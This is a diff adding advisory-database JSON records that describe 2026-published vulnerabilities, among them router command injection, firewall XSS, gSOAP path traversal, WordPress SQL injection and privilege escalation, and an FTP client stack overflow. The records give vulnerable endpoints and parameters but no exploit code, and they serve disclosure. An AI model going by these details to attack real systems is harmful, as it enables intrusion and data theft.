b/advisories/unreviewed/2026/02/GHSA-vfjw-j4jg-frr6/GHSA-vfjw-j4jg-frr6.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfjw-j4jg-frr6", + "modified": "2026-02-16T09:30:30Z", + "published": "2026-02-16T09:30:30Z", + "aliases": [ + "CVE-2026-2548" + ], + "details": "A flaw has been found in WAYOS FBM-220G 24.10.19. This affects the function sub_40F820 of the file rc. Executing a manipulation of the argument upnp_waniface/upnp_ssdp_interval/upnp_max_age can lead to command injection. The attack can be executed remotely. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2548" + }, + { + "type": "WEB", + "url": "https://github.com/glkfc/IoT-Vulnerability/blob/main/wayos/wayos.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346157" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346157" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.749802" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T09:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json b/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json new file mode 100644 index 0000000000000..94425dd4e91d3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vfmw-4jmp-wmrw/GHSA-vfmw-4jmp-wmrw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfmw-4jmp-wmrw", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60035" + ], + "details": "A vulnerability has been identified in the OPC.Testclient utility, which is included in Rexroth IndraWorks. All versions prior to 15V24 are affected. This flaw allows an attacker to execute arbitrary code on the user's system by parsing a manipulated file containing malicious serialized data. Exploitation requires user interaction, specifically opening a specially crafted file, which then causes the application to deserialize the malicious data, enabling Remote Code Execution (RCE). This can lead to a complete compromise of the system running the OPC.Testclient.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60035" + }, + { + "type": "WEB", + "url": "https://psirt.bosch.com/security-advisories/BOSCH-SA-591522.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vh22-vqgf-cr4h/GHSA-vh22-vqgf-cr4h.json b/advisories/unreviewed/2026/02/GHSA-vh22-vqgf-cr4h/GHSA-vh22-vqgf-cr4h.json new file mode 100644 index 0000000000000..90c2585ab7b54 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vh22-vqgf-cr4h/GHSA-vh22-vqgf-cr4h.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh22-vqgf-cr4h", + "modified": "2026-02-19T00:30:28Z", + "published": "2026-02-19T00:30:28Z", + "aliases": [ + "CVE-2019-25355" + ], + "details": "gSOAP 2.8 contains a directory traversal vulnerability that allows unauthenticated attackers to access system files by manipulating HTTP path traversal techniques. Attackers can retrieve sensitive files like /etc/passwd by sending crafted GET requests with multiple '../' directory traversal sequences.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25355" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47653" + }, + { + "type": "WEB", + "url": "https://www.genivia.com" + }, + { + "type": "WEB", + "url": "https://www.genivia.com/products.html#gsoap" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/genivia-gsoap-gsoap-path-traversal" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vj38-w7p7-r367/GHSA-vj38-w7p7-r367.json b/advisories/unreviewed/2026/02/GHSA-vj38-w7p7-r367/GHSA-vj38-w7p7-r367.json new file mode 100644 index 0000000000000..3f77c58367bd6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vj38-w7p7-r367/GHSA-vj38-w7p7-r367.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vj38-w7p7-r367", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25404" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted input through admin management parameters. Attackers can inject script payloads in the admin_name, name, and surname parameters via POST requests to the /korugan/admins endpoint, which are stored and executed when administrators access the interface.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25404" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-stored-cross-site-scripting-via-admins" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjf2-j9mf-px53/GHSA-vjf2-j9mf-px53.json b/advisories/unreviewed/2026/02/GHSA-vjf2-j9mf-px53/GHSA-vjf2-j9mf-px53.json new file mode 100644 index 0000000000000..9a60d9adff3e7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjf2-j9mf-px53/GHSA-vjf2-j9mf-px53.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjf2-j9mf-px53", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25378" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nelio Software Nelio AB Testing nelio-ab-testing allows Blind SQL Injection.This issue affects Nelio AB Testing: from n/a through <= 8.2.4.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25378" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/nelio-ab-testing/vulnerability/wordpress-nelio-ab-testing-plugin-8-2-4-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjg4-vp37-8p46/GHSA-vjg4-vp37-8p46.json b/advisories/unreviewed/2026/02/GHSA-vjg4-vp37-8p46/GHSA-vjg4-vp37-8p46.json new file mode 100644 index 0000000000000..8c7ebefac96ad --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjg4-vp37-8p46/GHSA-vjg4-vp37-8p46.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjg4-vp37-8p46", + "modified": "2026-02-16T09:30:30Z", + "published": "2026-02-16T09:30:30Z", + "aliases": [ + "CVE-2026-2547" + ], + "details": "A vulnerability was detected in LigeroSmart up to 6.1.26. The impacted element is the function AgentDashboard of the file /otrs/index.pl. Performing a manipulation of the argument Subaction results in cross site scripting. Remote exploitation of the attack is possible. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2547" + }, + { + "type": "WEB", + "url": "https://github.com/LigeroSmart/ligerosmart/issues/284" + }, + { + "type": "WEB", + "url": "https://github.com/LigeroSmart/ligerosmart/issues/284#issue-3879280231" + }, + { + "type": "WEB", + "url": "https://github.com/LigeroSmart/ligerosmart" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346156" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346156" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.749788" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T09:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjqp-jjh4-4pp5/GHSA-vjqp-jjh4-4pp5.json b/advisories/unreviewed/2026/02/GHSA-vjqp-jjh4-4pp5/GHSA-vjqp-jjh4-4pp5.json new file mode 100644 index 0000000000000..396b0d51ce480 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjqp-jjh4-4pp5/GHSA-vjqp-jjh4-4pp5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjqp-jjh4-4pp5", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25337" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in wpcoachify Coachify coachify allows Cross Site Request Forgery.This issue affects Coachify: from n/a through <= 1.1.5.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25337" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/coachify/vulnerability/wordpress-coachify-theme-1-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjwf-9x67-fj96/GHSA-vjwf-9x67-fj96.json b/advisories/unreviewed/2026/02/GHSA-vjwf-9x67-fj96/GHSA-vjwf-9x67-fj96.json new file mode 100644 index 0000000000000..a003b4397b44e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjwf-9x67-fj96/GHSA-vjwf-9x67-fj96.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjwf-9x67-fj96", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25402" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting crafted input to the username parameter. Attackers can send POST requests to the login endpoint with script payloads in the username field to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25402" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-cross-site-scripting-via-login" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjww-2j24-c357/GHSA-vjww-2j24-c357.json b/advisories/unreviewed/2026/02/GHSA-vjww-2j24-c357/GHSA-vjww-2j24-c357.json new file mode 100644 index 0000000000000..deee78eeb64eb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjww-2j24-c357/GHSA-vjww-2j24-c357.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjww-2j24-c357", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-13563" + ], + "details": "The Lizza LMS Pro plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.3. This is due to the 'lizza_lms_pro_register_user_front_end' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13563" + }, + { + "type": "WEB", + "url": "https://themeforest.net/item/lizza-lms-education-wordpress-theme/51057780" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b113f475-3133-4ea3-9152-03bb84d79307?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjxh-723c-34mp/GHSA-vjxh-723c-34mp.json b/advisories/unreviewed/2026/02/GHSA-vjxh-723c-34mp/GHSA-vjxh-723c-34mp.json new file mode 100644 index 0000000000000..12649d210ebcc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjxh-723c-34mp/GHSA-vjxh-723c-34mp.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjxh-723c-34mp", + "modified": "2026-02-11T21:30:38Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-48722" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48722" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vm49-qx2v-g672/GHSA-vm49-qx2v-g672.json b/advisories/unreviewed/2026/02/GHSA-vm49-qx2v-g672/GHSA-vm49-qx2v-g672.json new file mode 100644 index 0000000000000..7d1588f39e4dd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vm49-qx2v-g672/GHSA-vm49-qx2v-g672.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vm49-qx2v-g672", + "modified": "2026-02-11T18:31:28Z", + "published": "2026-02-11T06:30:41Z", + "aliases": [ + "CVE-2025-15400" + ], + "details": "The Pix para Woocommerce WordPress plugin through 2.13.3 allows any authenticated user to trigger AJAX actions that reset payment gateway configuration options without capability or nonce checks. This permits any authenticated users, such as subscribers to clear API credentials and webhook status, causing persistent disruption of OpenPix payment functionality.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15400" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/54c1251f-96be-4d70-b773-3db26b599838" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vm5x-8w9j-f2rm/GHSA-vm5x-8w9j-f2rm.json b/advisories/unreviewed/2026/02/GHSA-vm5x-8w9j-f2rm/GHSA-vm5x-8w9j-f2rm.json new file mode 100644 index 0000000000000..37be16dcf7c6c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vm5x-8w9j-f2rm/GHSA-vm5x-8w9j-f2rm.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vm5x-8w9j-f2rm", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:16Z", + "aliases": [ + "CVE-2026-23176" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86: toshiba_haps: Fix memory leaks in add/remove routines\n\ntoshiba_haps_add() leaks the haps object allocated by it if it returns\nan error after allocating that object successfully.\n\ntoshiba_haps_remove() does not free the object pointed to by\ntoshiba_haps before clearing that pointer, so it becomes unreachable\nallocated memory.\n\nAddress these memory leaks by using devm_kzalloc() for allocating\nthe memory in question.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23176" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/128497456756e1b952bd5a912cd073836465109d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/17f37c4cdf42a9e4915216b9e130fc8baef4cc64" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5bce10f0f9435afaae3fc4df9a52b01d9b3853dc" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bf0474356875d005d420f8c6b9ac168566e72e87" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ca9ff71c15bc8e48529c2033294a519a7749b272" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f2093e87ddec13e7a920f326c078a5f765ba89c3" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f93ae43780b759a70734be9bc82c1adcf7f33208" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json b/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json new file mode 100644 index 0000000000000..55d2bd16a9b2a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmr8-g4h2-2x5j", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2668" + ], + "details": "A vulnerability was found in Rongzhitong Visual Integrated Command and Dispatch Platform up to 20260206. This affects an unknown function of the file /dm/dispatch/user/add of the component User Handler. The manipulation results in improper access controls. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2668" + }, + { + "type": "WEB", + "url": "https://github.com/21151213732/CVE/blob/main/VICDP-Unauthorized%20Access2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753283" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vp3m-qh4p-wg7c/GHSA-vp3m-qh4p-wg7c.json b/advisories/unreviewed/2026/02/GHSA-vp3m-qh4p-wg7c/GHSA-vp3m-qh4p-wg7c.json new file mode 100644 index 0000000000000..f481da1a92ba1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vp3m-qh4p-wg7c/GHSA-vp3m-qh4p-wg7c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vp3m-qh4p-wg7c", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-0102" + ], + "details": "Under specific conditions, a malicious webpage may trigger autofill population after two consecutive taps, potentially without clear or intentional user consent. This could result in disclosure of stored autofill data such as addresses, email, or phone number metadata.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0102" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0102" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-359" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vp56-39mv-f923/GHSA-vp56-39mv-f923.json b/advisories/unreviewed/2026/02/GHSA-vp56-39mv-f923/GHSA-vp56-39mv-f923.json new file mode 100644 index 0000000000000..6b131e12bd6de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vp56-39mv-f923/GHSA-vp56-39mv-f923.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vp56-39mv-f923", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25332" + ], + "details": "FTP Commander Pro 8.03 contains a local stack overflow vulnerability that allows attackers to execute arbitrary code by overwriting the EIP register through a custom command input. Attackers can craft a malicious payload of 4108 bytes to overwrite memory and execute shellcode, demonstrating remote code execution potential.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25332" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/37810" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47775" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ftp-commander-pro-local-stack-overflow" + }, + { + "type": "WEB", + "url": "http://www.internet-soft.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vp99-6r6x-6v3c/GHSA-vp99-6r6x-6v3c.json b/advisories/unreviewed/2026/02/GHSA-vp99-6r6x-6v3c/GHSA-vp99-6r6x-6v3c.json new file mode 100644 index 0000000000000..76954873203a1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vp99-6r6x-6v3c/GHSA-vp99-6r6x-6v3c.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vp99-6r6x-6v3c", + "modified": "2026-02-19T21:30:47Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-23620" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain an arbitrary file existence enumeration vulnerability in the ListServer.IsDBExist() web method exposed at /MailEssentials/pages/MailSecurity/ListServer.aspx/IsDBExist. An authenticated user can supply an unrestricted filesystem path via the JSON key \\\"path\\\", which is URL-decoded and passed to File.Exists(), allowing the attacker to determine whether arbitrary files exist on the server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23620" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { 